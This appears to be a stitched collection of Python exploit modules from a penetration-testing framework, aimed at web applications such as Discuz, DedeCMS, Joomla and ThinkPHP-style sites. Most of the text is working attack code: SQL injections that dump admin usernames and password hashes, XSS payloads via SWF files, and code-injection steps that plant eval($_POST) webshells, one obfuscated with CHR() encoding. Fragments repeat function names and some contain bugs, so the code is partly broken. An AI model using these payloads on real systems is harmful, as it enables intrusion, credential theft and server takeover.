def exploit(options):
# 获取设置的参数
url = options["target"]["current_value"]
url = url + "/faq.php?action=grouppermission"
if verify(url):
manager_hash = get_hash(url)
logger.success("Username: %s" % manager_hash["username"])
logger.success("Hash: %s" % manager_hash["md5"])
return "%s: %s|%s" % (url, manager_hash["username"],
manager_hash["md5"])
def exploit(options):
logger.process("Requesting target site")
# 获取设置的参数
url = options["target"]["current_value"]
try:
result = verify(url)
logger.success("Username: %s" % result[0])
logger.success("password: %s" % result[1])
return "%s: %s|%s" % (url, result[0], result[1])
except:
pass
def exploit(options):
url = options['target']['current_value']
url = url + "/static/image/common/flvplayer.swf?file=1.flv&" \
"linkfromdisplay=true&link=javascript:alert(1);"
logger.process("Requesting target site")
response = http.get(url, 5)
if hashlib.md5(response.content).hexdigest(
) == "7d675405ff7c94fa899784b7ccae68d3":
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(options):
url = options['target']['current_value']
url = url + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
"?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
"rt%281%29;//"
logger.process("Requesting target site")
response = http.get(url)
if hashlib.md5(response.content).hexdigest(
) == "3a1c6cc728dddc258091a601f28a9c12":
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(options):
# 设置URL
url = options["target"]["current_value"] + payload
logger.process("send request...")
response = http.get(url)
if valiator(response.text) == True:
logger.success("exploit success, target site have xss vuln ! :)")
return True
else:
logger.error("exploit fail, target site no xss ! :(")
return False
def verify(url):
logger.process("Requesting target site")
data = {
"gids[99]":
"'",
"gids[100][0]":
") and (select 1 from (select count(*"
"),concat(version(),floor(rand(0)*2))"
"x from information_schema.tables gro"
"up by x)a)#"
}
response = http.post(url, data)
if "MySQL Query Error" in response.text:
logger.success("Exploitable!")
return True
def verify(url):
logger.process("Verify webshell...")
url = url + '/data/config.inc.php'
# 根据payload设置
payload = 'c=phpinfo()'
response = http.post(url, payload)
if "phpinfo" in response.text:
logger.success("Exploit success :)")
return {'shell': url, 'passwd': 'c'}
else:
logger.error('Exploit fail :(')
return False
def do_update(self, arg):
if not arg:
return
# 更新本地新增文件
if arg == 'local':
self.modules = manager.main(appdir)
return logger.success("update local file success :)")
def verify(URL):
response = http.get(URL +
"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
if "Request Error step 1" in response.content:
logger.success("Step 1: Exploitable!")
return get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
)
elif "Request Error step 2" in response.content:
logger.success("Step 2: Exploitable!")
return get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a"
)
else:
logger.error("It's not exploitable!")
def exploit(options):
# 获取设置的参数
url = options["target"]["current_value"]
payload = 'a=config&source=d7.2_x2.0&submit=yes&newconfig[target][dbhost]=localhost&newconfig[Config%0d%0a%0d%0a'
# eval($_POST[c])
payload += 'eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=localhost'
payload += '&newconfig[source][dbuser]=root&newconfig[source][dbpw]=&newconfig[source][dbname]=discuz&newconfig[source][tablepre]=cdb_'
payload += '&newconfig[source][dbcharset]=&newconfig[source][pconnect]=1&newconfig[target][dbhost]=localhost&newconfig[target][dbuser]=root&newconfig[target][dbpw]='
payload += '&newconfig[target][dbname]=discuzx&newconfig[target][tablepre]=pre_&newconfig[target][dbcharset]=&newconfig[target][pconnect]=1&submit=yes'
# 设置编码
payload.encode('utf-8')
response = http.post(url, payload)
result = verify(url)
if result:
logger.success("Webshell: %s" % result['shell'])
logger.success('Password: %s' % result['passwd'])
return result
def exploit(options):
# 日志回显
logger.process("set exploit params...")
# 获取设置的参数
url = options["target"]["current_value"]
logger.process("send request...")
# 设置header
headers = {'xxoo':'1111111111111111'}
# 请求
response = http.get(url, headers, 1)
if "success" in response:
logger.success("exploit success ! :)")
return True
else:
logger.error("exploit fail ! :(")
return False
def exploit(options):
# 日志回显
logger.process("set exploit params...")
# 获取设置的参数
url = options["target"]["current_value"]
payload = url + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)'
logger.process("send request...")
# 请求
response = http.get(url)
flag = hashlib.md5(1)
if flag.hexdigest() in response:
logger.success("exploit success ! :)")
return True
else:
logger.error("exploit fail ! :(")
return False
def exploit(options):
url = options['target']['current_value']
url = url + "/index.php/module/aciton/param1/${@phpinfo()}"
logger.process("Requesting target site")
response = http.get(url)
if "<title>phpinfo()</title>" in response.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
logger.success("Webshell: %s" % url)
return url
def exploit(options):
url = options['target']['current_value']
logger.process("Requesting " + url)
url = url + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
"%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
"password,0x68616e64736f6d65636875),5%20from%20et_users%23"
header = {'Cookie': options['cookie']['current_value']}
response = http.get(url, header, 5)
if "handsomechu" in response.text:
logger.success("Exploitable!")
user = response.text.split("handsomechu")[1].split("~~~")
username, password = user
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (url, username, password)
def exploit(options):
url = options['target']['current_value']
urls = [
url + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
url + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
]
for i, url in zip(range(1, 3), urls):
logger.process("Testing URL %d..." % i)
response = http.get(url)
if "<title>phpinfo()</title>" in response.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("%24%7B%40phpinfo%28%29%7D",
"%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
logger.success("WebShell: %s" % url)
return url
def exploit(options):
url = options['target']['current_value']
logger.process("Requesting " + url)
url = url + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
"16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
"36f6d65636875)%20from%20et_users%20limit%201,1%23"
# 设置cookie
header = {'Cookie': options['cookie']['current_value']}
response = http.get(url, header, 5)
if "handsomechu" in response.text:
logger.success("Exploitable!")
user = response.text.split("handsomechu")[1].split("~~~")
username, password = user
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (url, username, password)